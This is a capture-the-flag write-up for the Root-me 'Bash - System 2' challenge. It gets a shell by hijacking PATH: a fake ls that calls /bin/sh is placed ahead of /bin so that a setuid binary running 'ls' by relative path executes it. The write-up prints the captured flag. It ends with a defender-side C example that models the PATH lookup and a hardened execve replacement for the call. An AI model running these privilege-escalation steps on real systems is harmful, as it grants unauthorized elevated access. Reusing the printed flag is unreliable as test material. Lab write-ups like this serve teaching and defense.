Rootme Bash - System 2
Root-me.org
Bash - System 2
Simple Script
Once again we need to get the content of .passwd. This time the program calls ls with some options, and ls is named by a relative path, so it is looked up through PATH.
#include <stdlib.h>

int main(){
    /* "ls" is not an absolute path: /bin/sh -c resolves it through the caller's PATH */
    system("ls -lA /challenge/app-script/ch12/.passwd");
    return 0;
}
The options rule out the previous method, so this time we'll use /bin/sh to get a new shell running with the id of app-script-ch12-cracked.
We create an executable named ls whose only content is /bin/sh. We use /bin/sh rather than bash because bash drops the effective uid back to the real uid when the two differ (unless started with -p), while sh keeps it.
Because the binary has the setuid bit set, the shell it spawns inherits the effective uid of the binary's owner, app-script-ch12-cracked:
-r-sr-x--- 1 app-script-ch12-cracked app-script-ch12 7.0K Aug 11 2015 ch12
So we create a new directory, prepend it to PATH, and put our fake ls there.
mkdir -p /tmp/mine
echo "/bin/sh;" > /tmp/mine/ls
chmod +x /tmp/mine/ls
export PATH=/tmp/mine:$PATH
./ch12
id
uid=1312(app-script-ch12) gid=1312(app-script-ch12) euid=1409(app-script-ch12-cracked) groups=1409(app-script-ch12-cracked),100(users),1312(app-script-ch12)
cat .passwd
8a95eDS/*e_T#
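The following is an added example (not part of the original writeup or of the challenge code) written from the defender's side. It shows two things: a small model of the PATH walk that /bin/sh performs for a bare command name, which is why a directory prepended to PATH wins over /bin, and a hardened replacement for the system("ls ...") call that uses an absolute program path, an explicit argv and a fixed minimal environment via execve, so neither PATH nor any other inherited variable decides what gets executed. The lookup table in usable_demo (/tmp/mine/ls and /bin/ls) is constructed to mirror the page; usable_real is the filesystem-backed variant. The function and file names are this example's own choices.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Does a command string name its program by absolute path?
 * "ls -lA /x"      -> 0  (resolved through the caller's PATH: hijackable)
 * "/bin/ls -lA /x" -> 1  (fixed location) */
int command_is_absolute(const char *cmd) {
    while (*cmd == ' ' || *cmd == '\t') cmd++;
    return cmd[0] == '/';
}

/* Predicate deciding whether a candidate path would be executed. */
typedef int (*usable_fn)(const char *candidate);

/* Filesystem-backed predicate (approximation of what sh does). */
int usable_real(const char *candidate) {
    return access(candidate, X_OK) == 0;
}

/* Constructed table for offline demonstration: only these two files "exist". */
static const char *const demo_files[] = {"/tmp/mine/ls", "/bin/ls", NULL};
int usable_demo(const char *candidate) {
    for (int i = 0; demo_files[i]; i++)
        if (strcmp(candidate, demo_files[i]) == 0) return 1;
    return 0;
}

/* Walk a PATH value left to right the way sh does and return the 0-based
 * index of the first directory whose entry `name` satisfies `usable`,
 * copying the winning path into `out` (if non-NULL). Returns -1 if none. */
int path_lookup(const char *name, const char *path, usable_fn usable,
                char *out, size_t outlen) {
    const char *p = path;
    for (int idx = 0;; idx++) {
        const char *end = strchr(p, ':');
        size_t dirlen = end ? (size_t)(end - p) : strlen(p);
        char candidate[4096];
        /* An empty component means the current directory, as in sh. */
        if (dirlen == 0)
            snprintf(candidate, sizeof candidate, "./%s", name);
        else
            snprintf(candidate, sizeof candidate, "%.*s/%s", (int)dirlen, p, name);
        if (usable(candidate)) {
            if (out) snprintf(out, outlen, "%s", candidate);
            return idx;
        }
        if (!end) return -1;
        p = end + 1;
    }
}

/* Hardened replacement for system("ls -lA <file>"): no shell, absolute
 * program path, explicit argv and a fixed environment. Returns the child's
 * exit status, or -1 on failure. (A real setuid program should also drop
 * privileges before doing anything it does not need them for.) */
int run_ls_fixed(const char *file) {
    char *const argv[] = {"/bin/ls", "-lA", (char *)file, NULL};
    char *const envp[] = {"PATH=/usr/bin:/bin", NULL};
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve(argv[0], argv, envp);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    char hit[4096];
    /* With /tmp/mine prepended, the fake ls is found before /bin/ls. */
    int i = path_lookup("ls", "/tmp/mine:/usr/bin:/bin", usable_demo, hit, sizeof hit);
    printf("PATH=/tmp/mine:/usr/bin:/bin -> index %d: %s\n", i, hit);
    /* With a fixed PATH that never includes writable directories, /bin/ls wins. */
    i = path_lookup("ls", "/usr/bin:/bin", usable_demo, hit, sizeof hit);
    printf("PATH=/usr/bin:/bin -> index %d: %s\n", i, hit);
    printf("system(\"ls ...\") absolute? %d\n", command_is_absolute("ls -lA /challenge/app-script/ch12/.passwd"));
    printf("hardened ls exit status: %d\n", run_ls_fixed("/"));
    return 0;
}
```

The detection side of this is mechanical: any string passed to system() or popen() in a setuid binary whose first token is not an absolute path (command_is_absolute returns 0) is a candidate for exactly the hijack the writeup performs; the fix is the pattern in run_ls_fixed, or not being setuid at all.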